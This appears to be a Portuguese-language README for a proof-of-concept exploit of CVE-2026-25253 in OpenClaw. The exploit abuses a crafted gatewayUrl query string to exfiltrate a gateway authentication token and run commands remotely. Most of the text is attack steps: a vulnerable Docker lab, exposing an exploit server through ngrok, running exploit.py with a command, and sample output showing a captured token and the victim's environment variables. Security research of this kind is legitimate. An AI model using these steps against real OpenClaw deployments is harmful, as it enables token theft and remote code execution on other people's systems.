
OpenClaw Authentication Token Exfiltration
★ CVE-2026-25253 OpenClaw PoC de Execução Remota de Código em 1 Clique ★
https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e
CVE-2026-25253 : Vulnerabilidade de Exfiltração de Token de Autenticação do OpenClaw
descrição: OpenClaw (também conhecido como clawdbot ou Moltbot) anterior a v2026.1.29 permite que atacantes exfiltrem um token de autenticação de gateway armazenado ao fornecer um valor de query-string gatewayUrl manipulado para a Interface de Controle, que estabelece automaticamente uma conexão WebSocket sem validação ou confirmação do usuário. Isso pode levar a acesso não autorizado ao gateway e execução remota de código em 1 clique.
Dockerfile — constrói o ambiente vulnerável do OpenClawtemplates/ — páginas web maliciosas usadas pelo exploitconfig.txt — configuração do OpenClaw usada no ambiente da vítimaexploit.py — servidor do exploitrequirements.txt — dependências do PoCdocker build -t openclaw-vuln .
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
http://127.0.0.1:18789/
d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66config.txtpip3 install -r requirements.txt
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"
Exemplo:
python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
==================================================
[!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================
Publicamos análises de CVEs e malware uma vez por mês. Se estiver interessado, siga os links abaixo para conferir nossas publicações.